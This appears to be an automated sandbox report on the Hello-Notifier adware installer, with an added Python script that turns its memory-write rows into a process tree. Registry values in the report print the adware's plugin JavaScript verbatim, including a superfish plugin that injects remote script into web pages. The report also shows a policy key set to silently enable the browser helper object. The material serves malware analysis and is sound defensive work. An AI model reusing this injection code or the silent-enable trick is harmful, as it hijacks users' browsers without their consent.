Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\125\Url = "http://app-static.crossrider.com/plugins/javascripts/monetization/geo/arcadi2_m.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\104 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\JavaScript = "\n//------------------ PLUGIN superfish_no_coupons_m START ------------------\nif(typeof appAPI.internal.monetization===\"undefined\"){appAPI.internal.monetization={};}if(typeof appAPI.internal.monetization.plugins===\"undefined\"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[93]=function(){if(typeof appAPI.internal.monetization.verticals!==\"undefined\"){if(!appAPI.internal.monetization.verticals.shopping){return;}}try{if(!appAPI.dom.isHttps()){appAPI.dom.addRemoteJS({url:\"http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=\"+appAPI.internal.monetization.getSubId()});}}catch(a){throw new Error(\"something_went_wrong_in_superfish_\"+a.message);}};\n//------------------ PLUGIN superfish_no_coupons_m END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\Url = "http://app-static.crossrider.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\14\JavaScript
B=H;K=c(K,J,I,H,L[D+0],7,-680876936);H=c(H,K,J,I,L[D+1],12,-389564586);I=c(I,H,K,J,L[D+2],17,606105819);J=c(J,I,H,K,L[D+3],22,-1044525330);K=c(K,J,I,H,L[D+4],7,-176418897);H=c(H,K,J,I,L[D+5],12,1200080426);I=c(I,H,K,J,L[D+6],17,-1473231341);J=c(J,I,H,K,L[D+7],22,-45705983);K=c(K,J,I,H,L[D+8],7,1770035416);H=c(H,K,J,I,L[D+9],12,-1958414417);I=c(I,H,K,J,L[D+10],17,-42063);J=c(J,I,H,K,L[D+11],22,-1990404162);K=c(K,J,I,H,L[D+12],7,1804603682);H=c(H,K,J,I,L[D+13],12,-40341101);I=c(I,H,K,J,L[D+14],17,-1502002290);J=c(J,I,H,K,L[D+15],22,1236535329);K=j(K,J,I,H,L[D+1],5,-165796510);H=j(H,K,J,I,L[D+6],9,-1069501632);I=j(I,H,K,J,L[D+11],14,643717713);J=j(J,I,H,K,L[D+0],20,-373897302);K=j(K,J,I,H,L[D+5],5,-701558691);H=j(H,K,J,I,L[D+10],9,38016083);I=j(I,H,K,J,L[D+15],14,-660478335);J=j(J,I,H,K,L[D+4],20,-405537848);K=j(K,J,I,H,L[D+9],5,568446438);H=j(H,K,J,I,L[D+14],9,-1019803690);I=j(I,H,K,J,L[D+3],14,-187363961);J=j(J,I,H,K,L[D+8],20,1163531501);K=j(K,J,I,H,L[D+13],5,-1444681467);H=j(H,K,J,I,L[D+2],9,-51403784);I=j(I,H,K,J,L[D+7],14,1735328473);J=j(J,I,H,K,L[D+12],20,-1926607734);K=t(K,J,I,H,L[D+5],4,-378558);H=t(H,K,J,I,L[D+8],11,-2022574463);I=t(I,H,K,J,L[D+11],16,1839030562);J=t(J,I,H,K,L[D+14],23,-35309556);K=t(K,J,I,H,L[D+1],4,-1530992060);H=t(H,K,J,I,L[D+4],11,1272893353);I=t(I,H,K,J,L[D+7],16,-155497632);J=t(J,I,H,K,L[D+10],23,-1094730640);K=t(K,J,I,H,L[D+13],4,681279174);H=t(H,K,J,I,L[D+0],11,-358537222);I=t(I,H,K,J,L[D+3],16,-722521979);J=t(J,I,H,K,L[D+6],23,76029189);K=t(K,J,I,H,L[D+9],4,-640364487);H=t(H,K,J,I,L[D+12],11,-421815835);I=t(I,H,K,J,L[D+15],16,530742520);J=t(J,I,H,K,L[D+2],23,-995338651);K=a(K,J,I,H,L[D+0],6,-198630844);H=a(H,K,J,I,L[D+7],10,1126891415);I=a(I,H,K,J,L[D+14],15,-1416354905);J=a(J,I,H,K,L[D+5],21,-57434055);K=a(K,J,I,H,L[D+12],6,1700485571);H=a(H,K,J,I,L[D+3],10,-1894986606);I=a(I,H,K,J,L[D+10],15,-1051523);J=a(J,I,H,K,L[D+1],21,-2054922799);K=a(K,J,I,H,L[D+8],6,1873313359);H=a(H,K,J,I,L[D+15],10,-30611744);I=a(I,H,K,J,L[D+6],15,-1560198
380);J=a(J,I,H,K,L[D+13],21,1309151649);K=a(K,J,I,H,L[D+4],6,-145523070);H=a(H,K,J,I,L[D+11],10,-1120210379);I=a(I,H,K,J,L[D+2],15,718787259);J=a(J,I,H,K,L[D+9],21,-343485551);K=s(K,F);J=s(J,E);I=s(I,C);H=s(H,B);}return Array(K,J,I,H);}function d(G,D,C,B,F,E){return s(x(s(s(D,G),s(B,E)),F),C);}function c(D,C,H,G,B,F,E){return d((C&H)|((~C)&G),D,C,B,F,E);}function j(D,C,H,G,B,F,E){return d((C&G)|(H&(~G)),D,C,B,F,E);}function t(D,C,H,G,B,F,E){return d(C^H^G,D,C,B,F,E);}function a(D,C,H,G,B,F,E){return d(H^(C|(~G)),D,C,B,F,E);}function s(B,E){var D=(B&65535)+(E&65535);var C=(B>>16)+(E>>16)+(D>>16);return(C<<16)|(D&65535);}function x(B,C){return(B<<C)|(B>>>(32-C));}return{encode:p};}());}());\n//------------------ PLUGIN CrossriderUtils END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\ModeType = "production" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\JavaScript = "\n//------------------ PLUGIN IEInternal START ------------------\nvar Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===\"undefined\"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==\"undefined\"){window={};}if(typeof window.document===\"undefined\"){window.document={};document=window.document;}if(typeof window.alert===\"undefined\"){window.alert=function(b){var c;if(typeof b===\"undefined\"){c=\"undefined\";}else{if(b===null){c=\"null\";}else{c=b.toString();}}if(typeof c===\"string\"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===\"undefined\"){window.console={};console=window.console;}if(typeof console.log===\"undefined\"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===\"undefined\"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===\"undefined\"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===\"undefined\"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert===\"undefined\"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir===\"undefined\"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear===\"undefined\"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile===\"undefined\"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd===\"undefined\"){window.console.profileEnd=function(a){};console.profileEnd=window.console.profileEnd;}(function($){if(typeof 
appAPI.internal===\"undefined\"){appAPI.internal={};}if(typeof appAPI.internal.prefs===\"undefined\"){appAPI.internal.prefs={};}appAPI.internal.prefs.getChar=function(key,section){var value=$.getPref(key,section);if(value===\"__CR_@FAILED_DOWNLOAD_READ@_CR__\"){return null;}return value;};appAPI.internal.prefs.getInt=function(key,section){return parseInt(appAPI.internal.prefs.getChar(key,section));};appAPI.internal.prefs.setInt=function(value,key,section){return $.setIntPref(value,key,section);};appAPI.internal.prefs.setChar=function(value,key,section){return $.setCharPref(value,key,section);};appAPI.internal.prefs.getChildValueNames=function(section){var commaSeperatedList=$.getChildValueNames(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};appAPI.internal.prefs.getChildKeys=function(section){if(typeof $.getChildKeys===\"undefined\"){return;}var commaSeperatedList=$.getChildKeys(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};if(typeof appAPI.internal.debug===\"undefined\"){appAPI.internal.debug={};}appAPI.internal.debug.getDebugUrl=function(){var appCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedAppUrl\",\"Debug\");var bgCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedBgUrl\",\"Debug\");var res={userCode:appCodeUrl,backgroundCode:bgCodeUrl};return res;};appAPI.internal.debug.isDebugMode=function(){return(appAPI.internal.prefs.getChar(\"IsDebugMode\",\"Debug\")==\"1\");};appAPI.internal.debug.turnOn=function(debugUrls){if(typeof debugUrls===\"undefined\"||debugUrls===null){return false;}if(typeof debugUrls.userCode!==\"string\"){return false;}if(typeof debugUrls.backgroundCode!==\"string\"){return false;}appAPI.internal.prefs.setInt(\"IsDebugMode\",1,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedAppUrl\",debugUrls.userCode,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedBgUrl\",debugUrls.backgroundCode,\"Debug\");if(typeof $.reloadBg!==\"undefined\"){$.reloadBg();}return 
true;};appAPI.internal.debug.turnOff=function(){$.setIntPref(\"IsDebugMode\",0,\"Debug\");};appAPI.internal.reloadBackground=function(){if(typeof $.reloadBg===\"undefined\"){return false;}$.reloadBg();return true;};appAPI.internal.console=function(text,level){msgToSend={text:text,level:level};appAPI.internal.message.send({eventName:\"externalConsole\",eventContent:msgToSend});};appAPI.internal.console.log=function(text){appAPI.internal.console(text,\"log\");};appAPI.internal.console.info=function(text){appAPI.internal.console(text,\"info\");};appAPI.internal.console.warn=function(text){appAPI.internal.console(text,\"warn\");};appAPI.internal.console.error=function(text){appAPI.internal.console(text,\"error\");};appAPI.internal.log=function(str){$.log(str);};appAPI.internal.forceUpdate=function(){$.forceUpdate();};appAPI.internal.globalEval=function(js){if(typeof $.eval===\"undefined\"){console.error(\"appAPI.internal.globalEval is not supported\");return false;}if(typeof js!==\"string\"){console.error(\"appAPI.internal.globalEval expected a string as the 1st parameter and got: \"+typeof js);return false;}$.eval(js);return true;};if(typeof $.isIframe!==\"undefined\"){if(typeof appAPI.dom===\"undefined\"){appAPI.dom={};}appAPI.dom.isIframe=function(){return $.isIframe();};}appAPI.internal.getIsAddressBarShowing=function(){if(typeof $.isAddressBarShowing!==\"undefined\"){return $.isAddressBarShowing();}return 
false;};appAPI.internal.userCode={};appAPI.internal.userCode.getExtension=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"AppJavaScript\",\"Code\"));},10);};appAPI.internal.userCode.getBackground=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"BgJavaScript\",\"Code\"));},10);};appAPI.internal.plugins={};appAPI.internal.plugins.getOrder=function(target,callback){if(target===0){target=\"BgPluginList\";}else{if(target===1){target=\"AppPluginList\";}else{if(target===5){target=\"PopupPluginList\";}else{return;}}}var pluginsListIds=appAPI.internal.prefs.getChar(target,\"Plugins\");if(pluginsListIds){pluginsListIds=pluginsListIds.split(\",\");}var pluginsList=[];for(i=0;i<pluginsListIds.length;i++){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginsListIds[i]);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginsListIds[i]);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginsListIds[i]);pluginsList.push({id:pluginsListIds[i],name:name,url:url,ver:ver});}setTimeout(function(){callback(pluginsList);},10);};appAPI.internal.plugins.getInfo=function(pluginId,callback){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginId);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginId);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginId);setTimeout(function(){callback({name:name,ver:ver,id:pluginId});},10);};appAPI.internal.plugins.getCode=function(plugin,callback){var code=appAPI.internal.prefs.getChar(\"JavaScript\",\"Plugins\\\\\"+plugin.id);setTimeout(function(){callback(code);},10);};})(appAPIinternal);\n//------------------ PLUGIN IEInternal END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\OnRequestPluginList = "14,42,41,39,38,43,45,64,72" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\ActiveAppId = "37928" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Name = "Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Version = "2" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\22\Name = "resources" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\ = "CrossriderApp0037928 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\system32\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
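
The rows above are one line per WriteProcessMemory call, and ordinary process creation shows up the same way (the parent writes the new child's startup data before it runs), so the repeated triples are not injection evidence on their own; what the table is good for is the parent/child map of the installer. The script below is an added example, not part of the sandbox report: it parses rows in the format shown, collapses the repeated rows into a write count per edge, and prints the process tree. The rows embedded in it are a subset copied from the table above; the row grammar `PID <parent> wrote to memory of <child> N/A <parent image> <child image>` is assumed from those rows.

```python
import re
from collections import Counter, defaultdict

# Constructed input: a subset of the "wrote to memory of" rows from the table
# above, same PIDs and image paths, repeated rows kept on purpose.
SAMPLE_ROWS = r"""
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 4504 wrote to memory of 5072 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\system32\regsvr32.exe
PID 3788 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe
"""

# Assumed row grammar: both image paths start with a drive letter, so the
# first " X:\" after the parent image is the separator (paths may contain spaces).
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (.+?) ([A-Za-z]:\\.+)$")


def parse_rows(text):
    """Return (parent_pid, child_pid, parent_image, child_image) per row."""
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if m:  # header or malformed rows are skipped, not guessed at
            ppid, cpid, pimg, cimg = m.groups()
            events.append((int(ppid), int(cpid), pimg, cimg))
    return events


def build_tree(events):
    children = defaultdict(list)  # ppid -> child pids, first-seen order
    images = {}                   # pid -> image path
    writes = Counter()            # (ppid, cpid) -> number of write rows
    for ppid, cpid, pimg, cimg in events:
        images.setdefault(ppid, pimg)
        images.setdefault(cpid, cimg)
        if cpid not in children[ppid]:
            children[ppid].append(cpid)
        writes[(ppid, cpid)] += 1
    written_to = {c for kids in children.values() for c in kids}
    roots = [pid for pid in images if pid not in written_to]
    return roots, children, images, writes


def render_tree(roots, children, images, writes):
    """Indented parent/child listing with the collapsed write count per edge."""
    lines = []

    def walk(pid, depth, count):
        tag = f" ({count} write rows)" if count else ""
        lines.append("  " * depth + f"{pid} {images[pid]}{tag}")
        for kid in children.get(pid, []):
            walk(kid, depth + 1, writes[(pid, kid)])

    for root in roots:
        walk(root, 0, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(*build_tree(parse_rows(SAMPLE_ROWS)))))
```

Read the output against the Processes section: the dropper spawns the NSIS stub, which spawns every Hello-Notifier component plus two regsvr32 instances, and the 32-bit regsvr32 hands the 64-bit DLL off to the native regsvr32. An edge whose write count is far above the others, or whose parent is not the installer, is the one worth pulling the memory dump for.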

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID\{11111111-1111-1111-1111-110311791128} = "1" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe

"C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe"

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe

"C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe" /installxpi /agentregpath='Hello-Notifier' /extensionfilepath='C:\Program Files (x86)\Hello-Notifier\37928.xpi' /appid=37928 /srcid='000249' /subid='0' /zdata='0' /bic=0CC34B9305CC4362B008DD8A4336894AIE /verifier=bf3eda078706ebe98e31a33824224eec /installerversion=1_34_1_29 /installerfullversion=1.34.1.29 /installationtime=1729894738 /statsdomain=http://stats.srvstatsdata.com /errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=b2c81c06-4b2f-4808-b3ab-ef6f49041f37@f562099a-8022-43b2-aad5-98abd7b264a4.com /extensionversion=0.93 /prefsbranch=ab2c81c064b2f4808b3abef6f49041f37f562099a802243b2aad598abd7b264a4com37928 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/37928.rdf /extensionname='Hello-Notifier' /extensiondesc='Hello Notifier extention' /publishername='Hello-Notifier' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /showthankyoupage /runfrom='installer' /externallog='C:\Users\Admin\AppData\Local\Temp\Hello-NotifierInstaller_1729894738.log'

C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe

